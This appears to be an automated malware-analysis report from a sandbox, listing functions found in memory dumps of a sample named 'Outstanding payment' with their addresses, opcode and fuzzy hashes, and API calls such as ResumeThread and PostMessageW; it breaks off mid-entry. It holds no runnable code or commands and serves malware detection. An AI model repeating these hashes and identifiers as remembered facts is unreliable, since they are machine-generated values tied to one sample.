Source File: 00000000.00000002.2119388638.0000000009BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9bd0000_Outstanding payment.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: a0c3d7e44a42ca5fade08f6f9e4b7390828b75bd699f78aa9a8f3d9376854975
Instruction ID: b51eeeb83cf32b10489ab7e015f5716a8fca9dc35897763eb561af7d4d45868b
Opcode Fuzzy Hash: a0c3d7e44a42ca5fade08f6f9e4b7390828b75bd699f78aa9a8f3d9376854975
Instruction Fuzzy Hash: 9A1158B59002498FCB20DFAAC4447EFFBF5EF88324F20841AD419A7240C738A545CFA5

Function 09BD0AC8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(EC8B5509), ref: 09BD0B2A

Memory Dump Source

Source File: 00000000.00000002.2119388638.0000000009BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9bd0000_Outstanding payment.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 0ec24ca87539b3b0487297ea9e5161339e3e3af7c2057de4b21253d1c3dc0921
Instruction ID: 0be66125b77288bd87ce924e5a1806eb02b3066b968621d9a2ce380e5018b3a7
Opcode Fuzzy Hash: 0ec24ca87539b3b0487297ea9e5161339e3e3af7c2057de4b21253d1c3dc0921
Instruction Fuzzy Hash: 21113AB1D002498FCB10DFAAC4457EEFBF5EF88324F208419D519A7240CB79A545CBA5

Function 09BD138C Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 09BD5FCD

Memory Dump Source

Source File: 00000000.00000002.2119388638.0000000009BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9bd0000_Outstanding payment.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 7ae454797dd6f440dfa07b821e53816090a5711c67b0e5b01a45094e16aa4bfc
Instruction ID: b5cd06f4a7442a344d03909e860dad2ee92bd144ce8ead6c512899a75380d615
Opcode Fuzzy Hash: 7ae454797dd6f440dfa07b821e53816090a5711c67b0e5b01a45094e16aa4bfc
Instruction Fuzzy Hash: 3A1106B58043499FCB20DF99D884BDEFBF8EB48320F108459E519A7200D375A984CFA5

Function 09BD5F68 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 09BD5FCD

Memory Dump Source

Source File: 00000000.00000002.2119388638.0000000009BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9bd0000_Outstanding payment.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 73df780500cf6760fd392df00179b6e404bb55ed2d2f4d39f1e0bb14f78bf553
Instruction ID: 04117fd7eca7316cf0b16e2c4dd491c833309eebeb06f0d26a1f293b673f4af2
Opcode Fuzzy Hash: 73df780500cf6760fd392df00179b6e404bb55ed2d2f4d39f1e0bb14f78bf553
Instruction Fuzzy Hash: EE11E3B58003499FCB20DF99D589BEEFBF8EB48320F10845AE519A7210C3796544CFA1

Function 0B2FAF48 Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

Te]q, xrefs: 0B2FAFC4

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID: Te]q
API String ID: 0-52440209
Opcode ID: b391b93c9f26722d2b50338eebc91dd98278456f9031ad9853138d39b1e8ef7e
Instruction ID: e0f96bc45b60a19e0377491bebc59eda43414e17320baa2028456187e530625e
Opcode Fuzzy Hash: b391b93c9f26722d2b50338eebc91dd98278456f9031ad9853138d39b1e8ef7e
Instruction Fuzzy Hash: F04119B4E24209CFDB04DFAAD9846EEFBF6BF89300F108129E519AB394DB715841CB50

Function 0B2FAF38 Relevance: 1.3, Strings: 1, Instructions: 91COMMON

Download Yara Rule

Strings

Te]q, xrefs: 0B2FAFC4

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID: Te]q
API String ID: 0-52440209
Opcode ID: b99af1c5de010b9d4fa1e4ff19fe15c50e6ae2c4f4a13615f17eaa3df25862b9
Instruction ID: 9d823cbcfd464f3c7d45eaac6ea130242a8520939f6f90d20341ced4d4ce6346
Opcode Fuzzy Hash: b99af1c5de010b9d4fa1e4ff19fe15c50e6ae2c4f4a13615f17eaa3df25862b9
Instruction Fuzzy Hash: 2E3135B4D142098FDB08CFAAC9846DEFBF6BF89300F14C02AE419AB394DB701906CB50

Function 0B2F1878 Relevance: 1.3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

Strings

OijW, xrefs: 0B2F1931

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID: OijW
API String ID: 0-3475513506
Opcode ID: b2356fca757cafe91eb584714d18bbcda2560f902c1b445bd0e79b31a60c7b00
Instruction ID: 6ad46b5713a9e58a52bffe8b73722d1a6e73be9aa1203c7ee863399f345c5c49
Opcode Fuzzy Hash: b2356fca757cafe91eb584714d18bbcda2560f902c1b445bd0e79b31a60c7b00
Instruction Fuzzy Hash: F731F5B4E1420ADFCB44CFAAC581AAEFBF2BF88301F50846AC815A7314D3749A01CF91

Function 0B2F1888 Relevance: 1.3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

Strings

OijW, xrefs: 0B2F1931

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID: OijW
API String ID: 0-3475513506
Opcode ID: 424c30b086b2db6eaf456804fa30affaaf6b13d9dec637613b419397c419fca5
Instruction ID: b0c51913cae97b92d04a882109a004d3ba831b2d20e2fdce0a968290aa7ffe5f
Opcode Fuzzy Hash: 424c30b086b2db6eaf456804fa30affaaf6b13d9dec637613b419397c419fca5
Instruction Fuzzy Hash: 9B31C5B4E1421ADFDB44CFAAC581AAEFBF2BF88301F50946AC919A7314D3749A11CF50

Function 0B2F7EB1 Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

u|P, xrefs: 0B2F7EF7

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID: u|P
API String ID: 0-1764873574
Opcode ID: 79c10e38a7c350638ff1b0fbd0129707443d29ec898f866d7b6f2cd75f373c37
Instruction ID: 058a79124047d689b2b00a62dfadea4789de3927a46b58b0b54195418bed2a86
Opcode Fuzzy Hash: 79c10e38a7c350638ff1b0fbd0129707443d29ec898f866d7b6f2cd75f373c37
Instruction Fuzzy Hash: 0C312AB4E1524ADFCB44DFA9D5815AEFBF2FB85200F2085AAC914A3354E7345F41CB91

Function 0B2FB01C Relevance: 1.3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

Strings

Te]q, xrefs: 0B2FB041

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID: Te]q
API String ID: 0-52440209
Opcode ID: 016eb4ae7b425738867ed69d416e838399e9b39565731781ed2eb78e4686f539
Instruction ID: e3ba17073e4004cc3510f236f9031d46dad97c5979da363efdf70bc1ace94c60
Opcode Fuzzy Hash: 016eb4ae7b425738867ed69d416e838399e9b39565731781ed2eb78e4686f539
Instruction Fuzzy Hash: CE217F74E1420ACFCF04CF98C5849ADFBB5FB49710F10816AEA29AB265D7316946CB50

Function 0B2F3598 Relevance: 1.3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

?H,a, xrefs: 0B2F35CF

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID: ?H,a
API String ID: 0-4093759987
Opcode ID: 1e27767be4705cc4fc41f6824351918c80d605929b407cf9c42eb35d61bdd04d
Instruction ID: ae3ac8d75e209a703fbb0f0f560bf3482d8ce6c158d737a28e43041ff38c9ca4
Opcode Fuzzy Hash: 1e27767be4705cc4fc41f6824351918c80d605929b407cf9c42eb35d61bdd04d
Instruction Fuzzy Hash: F921F0B4E24209EFDB08DFA9C584A9EFBF2EF88200F14D5A5D519A7364DB30DA01CB44

Function 0B2F7EC0 Relevance: 1.3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

Strings

u|P, xrefs: 0B2F7EF7

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID: u|P
API String ID: 0-1764873574
Opcode ID: 2f5b93244f1c5395efb93250055fce30f53494aafe48c3bf445f4d2b46674021
Instruction ID: beb67e77299cbb52dc9fc8f97078624322d68eae88e0d14b8b1ec09fa768b534
Opcode Fuzzy Hash: 2f5b93244f1c5395efb93250055fce30f53494aafe48c3bf445f4d2b46674021
Instruction Fuzzy Hash: 071119B4E1520ADFCB04CFA9D5815AEFBF6AB88200F2085AAC509A3314D6349E41CB41

Function 0B2F5E78 Relevance: 1.3, Strings: 1, Instructions: 48COMMON

Download Yara Rule

Strings

G'/., xrefs: 0B2F5EFE

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID: G'/.
API String ID: 0-3562003039
Opcode ID: 1ceeaf0b1f667bfd6311623337aaa6126cdc9a1c30da27c3d1b34467f6683cf9
Instruction ID: afb0bd6d1ad4290ff4cdc82512ba8e581a8aca83d3917f41492a562f6fd05516
Opcode Fuzzy Hash: 1ceeaf0b1f667bfd6311623337aaa6126cdc9a1c30da27c3d1b34467f6683cf9
Instruction Fuzzy Hash: 2D01CCB0E29245EFDB08DBB4D48418EFFF3EB9A210F24D8BAC145E3264E2348A41C701

Function 0B2F5E88 Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

G'/., xrefs: 0B2F5EFE

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID: G'/.
API String ID: 0-3562003039
Opcode ID: 1dae965289871641ae56741c1b1768e8034d55b3d6cc76c3b3babb45bf74c261
Instruction ID: 176ae4e08fa4e9b8718cd8a62c2be60df8a374302dda4dab06acbdc493d94f71
Opcode Fuzzy Hash: 1dae965289871641ae56741c1b1768e8034d55b3d6cc76c3b3babb45bf74c261
Instruction Fuzzy Hash: F7017870E25209EFCB08DFB5D98465EFAB7EB9A201F20D4B9D50AA3254E7309A51C750

Function 0B2FE905 Relevance: 1.3, Strings: 1, Instructions: 38COMMON

Download Yara Rule

Strings

Z.]\, xrefs: 0B2FE966

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID: Z.]\
API String ID: 0-3673122294
Opcode ID: ada5f0094a088d4780ff8f20c33bbf9fa162c2f4f8cdcaf99cda42616b26ee75
Instruction ID: 814480b9ca8998f26ce7ac1307c43d9806562cd2706080dfb3fe46560f1a461c
Opcode Fuzzy Hash: ada5f0094a088d4780ff8f20c33bbf9fa162c2f4f8cdcaf99cda42616b26ee75
Instruction Fuzzy Hash: 4811A9349082498FD724DF24D845BA8BBBAFF48220F0085D8D52D97B19EA344E86CF11

Function 0B2FC96F Relevance: 1.3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

Strings

r, xrefs: 0B2FCA69

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID: r
API String ID: 0-1812594589
Opcode ID: ec1b92f1fdfe9cb9bae2f2af1d98528869b20b64c73c3a4649dad60fd7353bd2
Instruction ID: 1d51f594c072b22fe17a0f00cb5675550c02671db74eb3279b5f30f3cb61b4a1
Opcode Fuzzy Hash: ec1b92f1fdfe9cb9bae2f2af1d98528869b20b64c73c3a4649dad60fd7353bd2
Instruction Fuzzy Hash: B3016930A3810ADBD700CF99D0C48FCF339FB4DB41B10E1A2D62A56206C730A681CE50

Function 0B2FFC40 Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a486be5554273fd28d01be43cc5be851250316785bbb6ad4952f89e849a4543f
Instruction ID: 7d928e545bd1add46eb9665751fab759be2bfbb39f914193f454e25aff91c89b
Opcode Fuzzy Hash: a486be5554273fd28d01be43cc5be851250316785bbb6ad4952f89e849a4543f
Instruction Fuzzy Hash: 28A15C31E1120A8FCB04DFA9C684AAEFBF2BF88714F148469D615E7355DB349D42CBA1

Function 0B2F0EA7 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe8037e2e551d37a0ce0086ac87600d44629e085dadad5b306e44b5419284af4
Instruction ID: c7b0e74b4ceab4c90eb1ba55b6830b38b16005cbaa2ecf261c9fa5d78d77c14e
Opcode Fuzzy Hash: fe8037e2e551d37a0ce0086ac87600d44629e085dadad5b306e44b5419284af4
Instruction Fuzzy Hash: 576127B2C193859FCB02DF6CD890ADABFB4EF06210F0440BBD958DB253D6789905CBA1

Function 0B2FA3E8 Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04bfbdc20fabfa8fa0ee8e01e6244a9119591e6b1e47679dcc336b0c3e273870
Instruction ID: 9c07ad405ed20fb254f175e380d2845e1d1768670e090c0286009739cbc0b692
Opcode Fuzzy Hash: 04bfbdc20fabfa8fa0ee8e01e6244a9119591e6b1e47679dcc336b0c3e273870
Instruction Fuzzy Hash: EA519161D193C29FCB039B7C94A52D6BFB0EF43224F1A41E7C4948B1A3F6794946CB92

Function 0B2FE5C0 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6071613e70385e9012668da182c87608b40f7102ea88ddbbe7a0331380b955fe
Instruction ID: 921420715a7ad2d7333ea9e07dd5340398e9cac45bd851d9a70aafa657365fd0
Opcode Fuzzy Hash: 6071613e70385e9012668da182c87608b40f7102ea88ddbbe7a0331380b955fe
Instruction Fuzzy Hash: EA41F6709192868FDB02EFA8D4906D9BFB9FF46310F0641A2D1548F2B7D7789846CB52

Function 0B2FB708 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5d703f5af3eaa07aeca3631e5093fa0eb21526771b1b6641746248d94c4c362
Instruction ID: 1ace312aa8dca0f941a1989ebfe611f1d5e0d8f4721852bcfb4e5aeded5aa26f
Opcode Fuzzy Hash: d5d703f5af3eaa07aeca3631e5093fa0eb21526771b1b6641746248d94c4c362
Instruction Fuzzy Hash: 94414575D2920ACFDB08CFAAC5886EEFBF6AB8D301F14D029D529A7251D7789940CF50

Function 0B2F0F64 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 873f71c7550ab38daa4b2a00228d7ffc13d5794f550b26903c3441d1f64564cc
Instruction ID: 9dfd2381c000034678cb5e5c4909b056391cb431afce786a4175cb3b783e8425
Opcode Fuzzy Hash: 873f71c7550ab38daa4b2a00228d7ffc13d5794f550b26903c3441d1f64564cc
Instruction Fuzzy Hash: 863178B191024A9FCF10DFAAD884ADEBFF5EF48314F10846AE918E7210D775A954CFA0

Function 0B2F67D0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f993f1599f0e3d90c24fb00e77dafd15a9e460b32a9033dc337b3726bcabc296
Instruction ID: 9b67d772d03b5136d0c66227be5d23d70e627129ecbe81ce31ebeca68332e2aa
Opcode Fuzzy Hash: f993f1599f0e3d90c24fb00e77dafd15a9e460b32a9033dc337b3726bcabc296
Instruction Fuzzy Hash: C63103B4E1520A9FCB05CFA9E4856EEBBB2FF89310F10842AD525A7250D7345945CF50

Function 0B2F8718 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7b21aa9568fc6f1da6abfa8ec121fd76db48ed065aeef2f67e88e1a1fe3b005
Instruction ID: 9d42d07ec514ca96852ba179d66e83711b82342d6d7d3df6b8c255ea0de2d949
Opcode Fuzzy Hash: c7b21aa9568fc6f1da6abfa8ec121fd76db48ed065aeef2f67e88e1a1fe3b005
Instruction Fuzzy Hash: 33311874E2420ADFCB44CFA9D5846AEFBF2FB88311F20D96AC515AB350D7389A41CB50

Function 0B2F8708 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9465ff1c779af136663ae981af4afa7106be97018cf2ef8b66252145f4b939f8
Instruction ID: 2942384df91dbe7b8ae36c48eeb596a724909062667a992a539320b1c1bb8f62
Opcode Fuzzy Hash: 9465ff1c779af136663ae981af4afa7106be97018cf2ef8b66252145f4b939f8
Instruction Fuzzy Hash: AF315CB4E2524ADFDB44CFA9D58469EFBF2FF88310F10C4AAC515AB250D7389A40CB51

Function 0B2F67E0 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b08488fdd4f98f280ed4b152a7509a868cbe6fc799f0d7b85f7ad3ebf721c44
Instruction ID: 41849d86e789fb18d3a3ec3ae993bad32bb1b2af7c22632bf56be842fb9568c0
Opcode Fuzzy Hash: 7b08488fdd4f98f280ed4b152a7509a868cbe6fc799f0d7b85f7ad3ebf721c44
Instruction Fuzzy Hash: D431E2B4E1121ADFCB04DFA9E4845AEFBB6FF88310F10892AE925A7354D7345945CF50

Function 00DAD4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2106955229.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dad000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ac56ea675b23e6dc9ae9e3eeee882a7f1c65e7f42dbf8979f6ed3f8334b3535
Instruction ID: dcc433e492858bffb182ff42580dfa13c1f4964c9781a06b7247720fd7e555fa
Opcode Fuzzy Hash: 3ac56ea675b23e6dc9ae9e3eeee882a7f1c65e7f42dbf8979f6ed3f8334b3535
Instruction Fuzzy Hash: 12213771904240DFCB05DF14D9C0F26BF66FB9A318F24C569E94A0B656C33AD816DBB2

Function 00DBD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2107029574.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dbd000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9235ee3fd0135d95eed318925fa7555d78d3d5f6e2f6a93f2b1a4cb9dcd3af84
Instruction ID: fa68b228c95e00855ce608326d25d134f623c7b2c1e725640bc2ed2d8e32887f
Opcode Fuzzy Hash: 9235ee3fd0135d95eed318925fa7555d78d3d5f6e2f6a93f2b1a4cb9dcd3af84
Instruction Fuzzy Hash: 3021F275604204DFCB14EF24D984B66BF66FB88314F24C569E94A4B296D33AD807CA71

Function 00DBD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2107029574.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dbd000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d0045d99a73de67198c2c9c69cf7e505f257ac6ba06b7d0abd91f00d3bb2b9f
Instruction ID: 3bc465490eca4cc7062681e744b6b4cff0fd8130cdabfd1cb3b84ca1a53b21e8
Opcode Fuzzy Hash: 8d0045d99a73de67198c2c9c69cf7e505f257ac6ba06b7d0abd91f00d3bb2b9f
Instruction Fuzzy Hash: 18210471504284EFDB05DF24D9C0F66BBA6FB88314F24C56DE94A4B296D33AD806CB71

Function 0B2FC840 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85310ce89a75c0fd2965e10f216da394a25053ffbb9e43a009c0a4a9f5a97c4a
Instruction ID: d8796fb2b8d19a83c162d0621f37fcbf53c9a037cbdaacfa46533355437f44bc
Opcode Fuzzy Hash: 85310ce89a75c0fd2965e10f216da394a25053ffbb9e43a009c0a4a9f5a97c4a
Instruction Fuzzy Hash: 5721FD30D19359DFD705DFAAC9848EDBBFAFF8A300B0480AAE404AB252DB745806CF40

Function 0B2F19C0 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d96d3950a8d45f77ebbfd64c0f980438ec982296d5041d6318022ade0947da10
Instruction ID: 418b35eec25160e019a21d8a3f5b7b64f105a4fd79eb611852900609ca54e850
Opcode Fuzzy Hash: d96d3950a8d45f77ebbfd64c0f980438ec982296d5041d6318022ade0947da10
Instruction Fuzzy Hash: AA21C670E1420ADFCB08CFA9C581AAEFBF1FF89701F50C5A5D519A7214D6349A51CB91

Function 0B2FB890 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6479998a65da442362cfc0128c539387ee0de3d7aadb3c13cc1f0865b8726446
Instruction ID: b0ee9a0e0ddeda651e91532612090f08bc3a690c36f6cbe96a1660b5cf15e00c
Opcode Fuzzy Hash: 6479998a65da442362cfc0128c539387ee0de3d7aadb3c13cc1f0865b8726446
Instruction Fuzzy Hash: 9521E7B8D192099FCB40DFA9D1859AEBBF5AB49300F105069D919A7751C370AA41CB61

Function 0B2F3490 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f0572ed6cb989668386e253ed5bf5e97418ecad344667ccf4305dfdfa854f37
Instruction ID: 1b01c00963aa918f6386e034a2246397ee0ebccaae23b61cce84e2d6d2481c05
Opcode Fuzzy Hash: 5f0572ed6cb989668386e253ed5bf5e97418ecad344667ccf4305dfdfa854f37
Instruction Fuzzy Hash: 89217AB0E1524ADFCB05DFA9D5816AEFFF2BF89200F14C1AAC514A7260E7309B41CB95

Function 0B2F1E18 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ffa18d934f7d0e5da9a829ca553c4702eec96e673a4c2c3c26e38aac591931c
Instruction ID: e202ef024ec88ab25019bc021a62f8cbfa0a2a34bd6bbaa346eca4c413ea9a0a
Opcode Fuzzy Hash: 4ffa18d934f7d0e5da9a829ca553c4702eec96e673a4c2c3c26e38aac591931c
Instruction Fuzzy Hash: 1A2136B4E14209DFCB48DFA9D5806AEBBF2FB89301F5484AAD404E7754EB359A42CB50

Function 0B2F34A0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e56c1f384e8a0102c0130098f16192fc4a4bcbf126d76965bac0bbeab7a21de
Instruction ID: 7f0437dcb57b34787f009722461d2d04efa378d9ac5f58d8ee3421890ba5402c
Opcode Fuzzy Hash: 2e56c1f384e8a0102c0130098f16192fc4a4bcbf126d76965bac0bbeab7a21de
